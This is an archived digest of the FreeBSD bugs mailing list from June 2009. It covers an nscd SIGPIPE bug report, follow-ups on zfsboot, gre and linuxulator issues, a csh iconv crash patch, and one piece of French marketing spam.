18:01:57 +0100 Received: from anu.hursley.ibm.com (emmi.hursley.ibm.com [9.20.217.22]) by d06av02.portsmouth.uk.ibm.com (8.12.11.20060308/8.12.11) with ESMTP id n5QH1vGM003861 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO); Fri, 26 Jun 2009 18:01:57 +0100 Received: from anu.hursley.ibm.com (localhost [127.0.0.1]) by anu.hursley.ibm.com (8.14.3/8.14.3) with ESMTP id n5QGannu003914; Fri, 26 Jun 2009 17:36:51 +0100 (BST) (envelope-from astevens@localhost.hursley.ibm.com) Received: (from astevens@localhost) by anu.hursley.ibm.com (8.14.3/8.14.3/Submit) id n5QGahJn003911; Fri, 26 Jun 2009 17:36:43 +0100 (BST) (envelope-from astevens) Message-Id: <200906261636.n5QGahJn003911@anu.hursley.ibm.com> Date: Fri, 26 Jun 2009 17:36:43 +0100 (BST) From: Andrew Stevenson To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Cc: des@FreeBSD.org Subject: bin/136073: recent nscd changes cause client processes to die with SIGPIPE X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: Andrew Stevenson List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 26 Jun 2009 17:30:02 -0000 >Number: 136073 >Category: bin >Synopsis: recent nscd changes cause client processes to die with SIGPIPE >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Jun 26 17:30:01 UTC 2009 >Closed-Date: >Last-Modified: >Originator: Andrew Stevenson >Release: FreeBSD 7.2-STABLE i386 >Organization: UgH! >Environment: System: FreeBSD anu.hursley.ibm.com 7.2-STABLE FreeBSD 7.2-STABLE #14: Thu Jun 25 12:28:57 BST 2009 root@anu.hursley.ibm.com:/usr/obj/usr/src/sys/ANU i386 >Description: After upgrading to stable as of 2 days ago I have found that processes trying to fetch password data frequently die with SIGPIPE. My nsswitch.conf contains: passwd: files cache ldap group: files cache ldap Removing cache makes the problem go away, as does reverting to nscd from 7.2-RELEASE. If I run nscd -nst (nscd from stable) it logs the error: E3 from on_mp_write_session_write_response_write1: write failed when the problem occurs. I had a quick look at the code but didn't understand the structure well enough to know what it was supposed to be doing. I have 2 ldap servers configured both using ldaps. This prevented me from logging into the machine after the upgrade though I had console access so could recover. >How-To-Repeat: Any password checking process seems to suffer - e.g. try to log on from the console or via XDM or su from an existing shell. Oddly ssh, even when using passwords seems unaffected. I used "logins" to do most of my testing. >Fix: Work around is to revert to nscd from 7.2-RELEASE or to change nsswitch.conf to not use cache. >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Sat Jun 27 00:04:33 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 6C50C106564A for ; Sat, 27 Jun 2009 00:04:33 +0000 (UTC) (envelope-from do-1976-7043112-1083896-12--freebsd-bugs.hub.freebsd.org@rt.emm08.net) Received: from iraklia201.emm02.net (iraklia201.emm02.net [80.118.49.201]) by mx1.freebsd.org (Postfix) with ESMTP id 23F128FC08 for ; Sat, 27 Jun 2009 00:04:33 +0000 (UTC) (envelope-from do-1976-7043112-1083896-12--freebsd-bugs.hub.freebsd.org@rt.emm08.net) DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=dk; d=b-f-j.fr; h=Message-Id:Reply-To:Mime-Version:Content-Type:Content-Transfer-Encoding:List-Unsubscribe:From:To:Date:Subject; i=ludivine@b-f-j.fr; bh=VZIE0qs3/b9JTlhujOI4ZvwO4Fw=; b=guUvnplvGcewydAL0K+Wd/xIjRpkVe8f2o+xEenAXfXm4WtDv76L7svv7pt9nagRnXyZZKWRq50D Wgg6Th5wWm2Px18l7jt/cRqgtgvRr3G36l+VQrITJPkxBBJ8INMoCAPsQpqY1pibOEwwNhm9gAQ/ b/G/m2HwDS6MOzm9RJg= DomainKey-Signature: a=rsa-sha1; c=nofws; q=dns; s=dk; d=b-f-j.fr; b=gV9GJHDf0X0aGmqwuOrx134+ByT3zFGUVNiJZeb/He57GiezjIY1vH5N0nDOZNAJUrt/cZYCh6VA n7CLwvzLzS2rvxWxreMlaJPBNrTK/HtwrJor7FszfIX8xKRZP6Ib5tTQ59RhYqojv4Ajw4LPRH4d kjqJacRbnRrcxJrBJLk=; Message-Id: Content-Transfer-Encoding: 8bit List-Abuse: X-CAMPAIGN-ID: 1976-7043112-1083896 X-Mailer: DNET 108389619767043112 From: =?ISO-8859-1?Q?B-F-J?= To: Date: Sat, 27 Jun 2009 01:43:16 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1" X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Cc: Subject: Envoi campagne fax X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: =?ISO-8859-1?Q?B-F-J?= List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 27 Jun 2009 00:04:33 -0000 Bonjour, si vous ne lisez pas correctement ce message, regardez la version en ligne Merci. Vous recevez ce courriel sur l'adresse freebsd-bugs@hub.freebsd.org [1]emailing [2]jacqueline@force-marketing.fr [3]http://www.force-marketing.fr "Ce courriel ainsi que les documents attaches peuvent contenir des informations parfois confidentielles. Si vous n'etes pas le bon destinataire, merci d'en informer la personne expeditrice dans les plus brefs delais et de mettre a la corbeille le courriel avec tous les documents attaches de votre systeme informatique. Toute divulgation, distribution ou copie du present courriel et des documents attaches sans aucune autorisation prealable de son emetteur est strictement non autorisée. This e-mail and any attached documents may contain confidential or proprietary information. If you are not the intended recipient, please advise the sender immediately and delete this e-mail and all attached documents from your computer system. Any unauthorised disclosure, distribution or copying hereof is prohibited. " Pour ne plus recevoir de courriels de notre part, il vous suffit de vous[4] rendre sur cette page. Pour ne plus recevoir de courriels de notre part, il vous suffit de vous rendre sur [5]cette page. References Visible links 1. http://url.b-f-j.fr/id.asp?l=51212-7043112-1083896-1976-0 2. mailto:jacqueline@force-marketing.fr 3. http://url.b-f-j.fr/id.asp?l=51213-7043112-1083896-1976-0 4. http://url.b-f-j.fr/id.asp?l=51211-7043112-1083896-1976-0 5. http://url.b-f-j.fr/id.asp?l=51214-7043112-1083896-1976-0&id=1083896-1976-7043112-110b4ca6&res=fr Hidden links: 6. http://url.b-f-j.fr/id.asp?l=51212-7043112-1083896-1976-0 7. http://url.b-f-j.fr/id.asp?l=51212-7043112-1083896-1976-0 8. http://url.b-f-j.fr/id.asp?l=51212-7043112-1083896-1976-0 9. http://url.b-f-j.fr/id.asp?l=51212-7043112-1083896-1976-0 10. http://url.b-f-j.fr/id.asp?l=51212-7043112-1083896-1976-0 11. http://url.b-f-j.fr/id.asp?l=51212-7043112-1083896-1976-0 From owner-freebsd-bugs@FreeBSD.ORG Sat Jun 27 02:10:03 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id C28FB1065670 for ; Sat, 27 Jun 2009 02:10:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 961FE8FC08 for ; Sat, 27 Jun 2009 02:10:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5R2A3Ck098794 for ; Sat, 27 Jun 2009 02:10:03 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5R2A3Ep098788; Sat, 27 Jun 2009 02:10:03 GMT (envelope-from gnats) Date: Sat, 27 Jun 2009 02:10:03 GMT Message-Id: <200906270210.n5R2A3Ep098788@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org From: RandomUser Cc: Subject: Re: kern/134914: kernel/zfsboot buildworld error 'btxld: zfsboot.ldr: Invalid argument' X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: RandomUser List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 27 Jun 2009 02:10:04 -0000 The following reply was made to PR kern/134914; it has been noted by GNATS. From: RandomUser To: bug-followup@FreeBSD.org, rannumgen@globaleyes.net Cc: Subject: Re: kern/134914: kernel/zfsboot buildworld error 'btxld: zfsboot.ldr: Invalid argument' Date: Fri, 26 Jun 2009 20:56:36 -0500 Bug apparently fixed as of June 21, 2009. Recompile FBSD-7.2-STABLE as of 06/21/2009 succeeds without any ZFS errors. Second 7.2 system world recompile as of 06/23 also succeeded without any ZFS errors. This PR may be closed. From owner-freebsd-bugs@FreeBSD.ORG Sat Jun 27 05:31:24 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 9A483106566C; Sat, 27 Jun 2009 05:31:24 +0000 (UTC) (envelope-from linimon@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 6EC2F8FC15; Sat, 27 Jun 2009 05:31:24 +0000 (UTC) (envelope-from linimon@FreeBSD.org) Received: from freefall.freebsd.org (linimon@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5R5VOYn075333; Sat, 27 Jun 2009 05:31:24 GMT (envelope-from linimon@freefall.freebsd.org) Received: (from linimon@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5R5VOZj075329; Sat, 27 Jun 2009 05:31:24 GMT (envelope-from linimon) Date: Sat, 27 Jun 2009 05:31:24 GMT Message-Id: <200906270531.n5R5VOZj075329@freefall.freebsd.org> To: rannumgen@globaleyes.net, linimon@FreeBSD.org, freebsd-bugs@FreeBSD.org From: linimon@FreeBSD.org Cc: Subject: Re: kern/134914: kernel/zfsboot buildworld error 'btxld: zfsboot.ldr: Invalid argument' X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 27 Jun 2009 05:31:25 -0000 Synopsis: kernel/zfsboot buildworld error 'btxld: zfsboot.ldr: Invalid argument' State-Changed-From-To: open->closed State-Changed-By: linimon State-Changed-When: Sat Jun 27 05:31:16 UTC 2009 State-Changed-Why: Closed at submitter's request. http://www.freebsd.org/cgi/query-pr.cgi?pr=134914 From owner-freebsd-bugs@FreeBSD.ORG Sat Jun 27 05:50:02 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id BA895106564A for ; Sat, 27 Jun 2009 05:50:02 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 8D1AA8FC13 for ; Sat, 27 Jun 2009 05:50:02 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5R5o2rX084481 for ; Sat, 27 Jun 2009 05:50:02 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5R5o2Om084480; Sat, 27 Jun 2009 05:50:02 GMT (envelope-from gnats) Date: Sat, 27 Jun 2009 05:50:02 GMT Message-Id: <200906270550.n5R5o2Om084480@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org From: =?UTF-8?B?0JXQstCz0LXQvdC40Lkg0JbQtdCz0LDQvdC40L0=?= Cc: Subject: Re: conf/111557: [gre] link1 flag doesn't work as intended when specified in startup scripts X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: =?UTF-8?B?0JXQstCz0LXQvdC40Lkg0JbQtdCz0LDQvdC40L0=?= List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 27 Jun 2009 05:50:03 -0000 The following reply was made to PR conf/111557; it has been noted by GNATS. From: =?UTF-8?B?0JXQstCz0LXQvdC40Lkg0JbQtdCz0LDQvdC40L0=?= To: bug-followup@FreeBSD.org, emz@norma.perm.ru Cc: Subject: Re: conf/111557: [gre] link1 flag doesn't work as intended when specified in startup scripts Date: Sat, 27 Jun 2009 11:25:04 +0600 FreeBSD 7.2 is still affected. From owner-freebsd-bugs@FreeBSD.ORG Sat Jun 27 07:10:03 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 4A045106564A for ; Sat, 27 Jun 2009 07:10:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 37C0A8FC13 for ; Sat, 27 Jun 2009 07:10:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5R7A2Bg052776 for ; Sat, 27 Jun 2009 07:10:02 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5R7A2KO052775; Sat, 27 Jun 2009 07:10:02 GMT (envelope-from gnats) Date: Sat, 27 Jun 2009 07:10:02 GMT Message-Id: <200906270710.n5R7A2KO052775@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org From: John Wehle Cc: Subject: Re: bin/130831: csh(1) core dumps after building libiconv-1.1x from source on 7.0 and 7.1 X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: John Wehle List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 27 Jun 2009 07:10:03 -0000 The following reply was made to PR bin/130831; it has been noted by GNATS. From: John Wehle To: bug-followup@FreeBSD.org Cc: david@backpack.com Subject: Re: bin/130831: csh(1) core dumps after building libiconv-1.1x from source on 7.0 and 7.1 Date: Sat, 27 Jun 2009 02:51:17 -0400 (EDT) I encountered the same problem using FreeBSD 7.2. There is code in bin/csh/iconv_stub.c which attempts to dynamically load and use iconv. The problem is it makes assumptions as to which libiconv it's using (e.g. function names, calling conventions, parameters, etc). It's dangerous for there to be any code in the base applications / libraries that attempts to use functionality which is not supplied by the base libraries. The enclosed patch resolved the problem for me. -- John ------------------------8<------------------------------8<--------------- --- bin/csh/iconv_stub.c.ORIGINAL 2009-04-14 23:14:26.000000000 -0400 +++ bin/csh/iconv_stub.c 2009-05-18 21:45:20.000000000 -0400 @@ -57,8 +57,10 @@ dl_iconv_open(const char *tocode, const return (iconv_t)-1; } else { initialized = 1; +/* iconvlib = dlopen(ICONVLIB, RTLD_LAZY | RTLD_GLOBAL); if (iconvlib == NULL) +*/ return (iconv_t)-1; iconv_open = (iconv_open_t *)dlfunc(iconvlib, ICONV_OPEN); dl_iconv = (dl_iconv_t *)dlfunc(iconvlib, ICONV_ENGINE); ------------------------------------------------------------------------- | Feith Systems | Voice: 1-215-646-8000 | Email: john@feith.com | | John Wehle | Fax: 1-215-540-5495 | | ------------------------------------------------------------------------- From owner-freebsd-bugs@FreeBSD.ORG Sat Jun 27 10:29:34 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id ED253106566C; Sat, 27 Jun 2009 10:29:34 +0000 (UTC) (envelope-from bz@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id C36C68FC25; Sat, 27 Jun 2009 10:29:34 +0000 (UTC) (envelope-from bz@FreeBSD.org) Received: from freefall.freebsd.org (bz@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5RATYnd051533; Sat, 27 Jun 2009 10:29:34 GMT (envelope-from bz@freefall.freebsd.org) Received: (from bz@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5RATYBm051529; Sat, 27 Jun 2009 10:29:34 GMT (envelope-from bz) Date: Sat, 27 Jun 2009 10:29:34 GMT Message-Id: <200906271029.n5RATYBm051529@freefall.freebsd.org> To: bz@FreeBSD.org, freebsd-bugs@FreeBSD.org, jamie@FreeBSD.org From: bz@FreeBSD.org Cc: Subject: Re: bin/136071: 8.0-CURRENT fails to build boot_crunch binaries (make release.4) X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 27 Jun 2009 10:29:35 -0000 Synopsis: 8.0-CURRENT fails to build boot_crunch binaries (make release.4) Responsible-Changed-From-To: freebsd-bugs->jamie Responsible-Changed-By: bz Responsible-Changed-When: Sat Jun 27 10:28:50 UTC 2009 Responsible-Changed-Why: Jamie can you check the patch and if ok, get it comitted? http://www.freebsd.org/cgi/query-pr.cgi?pr=136071 From owner-freebsd-bugs@FreeBSD.ORG Sat Jun 27 23:40:03 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 206D810656B0 for ; Sat, 27 Jun 2009 23:40:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 089AA8FC1B for ; Sat, 27 Jun 2009 23:40:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5RNe2YB057627 for ; Sat, 27 Jun 2009 23:40:02 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5RNe2vg057626; Sat, 27 Jun 2009 23:40:02 GMT (envelope-from gnats) Date: Sat, 27 Jun 2009 23:40:02 GMT Message-Id: <200906272340.n5RNe2vg057626@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org From: Alexander Best Cc: Subject: Re: kern/133144: [linux] linuxulator 2.6 crashes with nvidias libGL.so.1 X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: Alexander Best List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 27 Jun 2009 23:40:03 -0000 The following reply was made to PR kern/133144; it has been noted by GNATS. From: Alexander Best To: Cc: Chagin Dmitry Subject: Re: kern/133144: [linux] linuxulator 2.6 crashes with nvidias libGL.so.1 Date: Sun, 28 Jun 2009 01:34:23 +0200 (CEST) i talked to zander who is responsible for the freebsd nvidia driver and he said the following about this PR: "the two libnvidia-tls libraries support different TLS models: the one currently shipped with the NVIDIA FreeBSD graphics driver supports the old-style TLS model, the tls/ one the new ELF TLS model. The crashes you were seeing were not due to a problem with the Linux emulation layer. Future NVIDIA FreeBSD graphics driver releases will automatically determine which library to install." so even if the modify_ldt() linux syscall isn't implemented properly, this PR is not related to it. oh...btw: there have been some changes to modify_ldt() in HEAD. i think running the linux test project now passes that syscall. cheers.